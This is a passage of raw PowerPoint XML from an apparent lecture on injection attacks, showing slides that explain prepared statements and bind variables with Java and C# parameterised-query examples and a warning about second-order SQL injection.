              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7846379" y="2025748"/>
            <a:ext cx="3513108" cy="4229049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA27B083-EF06-174A-91E1-42C83EF8D842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20160852">
            <a:off x="5080781" y="2408808"/>
            <a:ext cx="6637463" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Make sure unsafe inputs cannot change the meaning of query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C6A7DAB-C538-CE49-A447-B69F41E433A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="832513" y="955343"/>
            <a:ext cx="5022377" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Most injection attacks trick application into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interpreting data as code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25745001-0661-B14A-88AC-CBF120E83EAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="832513" y="2531919"/>
            <a:ext cx="4554811" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This changes the semantics of a query or command generated by the application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361471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54F0C1F-9216-A142-81DF-845FD25EA8EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Prepared Statements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98E532AF-E82D-EA4D-BF08-9AC653A4B9D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1098219" y="2000718"/>
            <a:ext cx="8601075" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> =</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>db.prepareStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>("SELECT pizza, toppings, quantity, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>order_day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>                        + "FROM orders WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>order_month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008F00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ps.setInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>session.getCurrentUserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ps.setInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Integer.parseInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>request.getParamenter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>("month")));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> res = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ps.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36868" name="Text Box 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B3A150E-634D-B342-9058-503B8B4BD617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6983246" y="3729141"/>
            <a:ext cx="3894011" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bind variable (data placeholder)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66565" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7E7CD01-02D2-7D4C-B9B4-B9328CD42C11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8769302" y="2954440"/>
            <a:ext cx="0" cy="776287"/>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66" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6874CBFC-B7E6-4945-A879-9339F818C9F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6373647" y="3260828"/>
            <a:ext cx="2414587"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67" name="Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0935626-B2B2-AF43-A156-25A48B1DB480}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6373647" y="2954440"/>
            <a:ext cx="0" cy="30638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568" name="Rectangle 8" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF82FD3-1EBB-7843-9C04-A877E006AB40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1098219" y="4310258"/>
            <a:ext cx="7895656" cy="1952625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Prepared statements are parsed without data parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Bind variables are typed (int, string, …)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BC84214-EB1C-A440-9E75-7E741DE58C8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5983771" y="6093606"/>
            <a:ext cx="5892960" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>docs.oracle.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>javase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/tutorial/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>jdbc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/basics/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>prepared.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDF41085-9D21-5145-81D1-FFBF4C217E82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1398470" y="5297834"/>
            <a:ext cx="2688609" cy="707886"/>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000" dirty="0"/>
              <a:t>But beware of second-order SQL injection!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5D20174-769A-AE4B-86FC-3B7DA4BFED1D}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1446684" y="4666933"/>
              <a:ext cx="7286760" cy="100440"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="Ink 4">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5D20174-769A-AE4B-86FC-3B7DA4BFED1D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="1411044" y="4631293"/>
                <a:ext cx="7358400" cy="172080"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20910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descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9C453BA-1461-EA46-8F40-A7ECD63BBAC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SqlCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SqlCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	“SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UserTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WHERE 	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dbConnection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.Parameters.Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@User</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”, Request[“user”] ); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.Parameters.Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”, Request[“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”] ); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
